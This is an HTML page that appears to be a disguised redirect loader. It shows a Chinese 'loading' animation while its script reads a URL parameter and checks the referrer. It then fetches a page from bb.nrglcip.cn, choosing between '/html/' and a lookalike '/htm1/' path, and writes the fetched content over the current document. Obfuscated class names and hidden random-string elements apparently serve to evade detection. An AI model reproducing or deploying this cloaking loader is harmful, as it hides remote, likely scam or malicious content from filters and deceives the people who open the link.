<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .WuOEHf {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .WuOEHf .S3QZQnTw {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .WuOEHf .content {
            line-height: 50px;
            text-align: center
        }

        .WuOEHf .img {
            width: 100%
        }

        .WuOEHf .hS6D7TDh4D {
            text-align: center
        }

        .WuOEHf .hS6D7TDh4D span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .WuOEHf .hS6D7TDh4D span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .WuOEHf .hS6D7TDh4D span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .WuOEHf .hS6D7TDh4D span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .WuOEHf .hS6D7TDh4D span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .WuOEHf .hS6D7TDh4D span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .WuOEHf .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function sPm479KxHJr(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DHazV = sPm479KxHJr('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DHazV +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DHazV +".html?a=share";
		}
		
        h0DGpj26s3=url+"#"+new Date().getTime();
        h0DGpj26s3 && function() {
            $.get(h0DGpj26s3, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >dHdPE8MI4qfviQ0o8HMRmrLOzt</h1>
<ul style='display:none' >Zv2WVHtHCi9v04Lx0kErAE</ul>
<span style='display:none'>LADbYbMeu218VFKH1cnaHMWmlAhloWIpFJcxaYi1QxQWYhNssk7Uwv3HPB65RkWbhYdZbPdZbTfpJmjHrGqU</span>
<img  src='' style='display:none'>
<p  style='display:none'>Uz8ezdjBWrPTI7WiRU3Td35spXBrgE4gUGfuy1f7L3IdyngzJzCFqdCkchfnozcVs4DqHzTolIwRcybRlt7b0E6hvXebj5</p>
<a  href='#' style='display:none'>pytXY5vgHRy6kFF3EviQHOjVU3m9U3kCoCfCHtqr66pgkrJ8pT9FXpFP2w</a>
<ul style='display:none' >Zv2WVHtHCi9v04Lx0kErAE</ul><div class="WuOEHf">
    <div class="S3QZQnTw">
        <div class="hS6D7TDh4D">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<ul style='display:none' >KiMWrMqiLC8Nw8vJ7M81luv8qRAA0yFz</ul>
<ul style='display:none' >KiMWrMqiLC8Nw8vJ7M81luv8qRAA0yFz</ul>
<li style='display:none' >cxIAdGjY6uLiPIua64gzBf1dW7EMycSWsXej3iM9OHDlEauRElxRCvGL65fsroyT37GzfcXinSQVQL73JRtXlCfbNETX2YB</li>
<a  href='#' style='display:none'>MB2u1eMVE7dhZAjgwF63MeWNsgA9Qh6XLD3M8Dsnxe4Jx6N0qZ</a></body>
</html>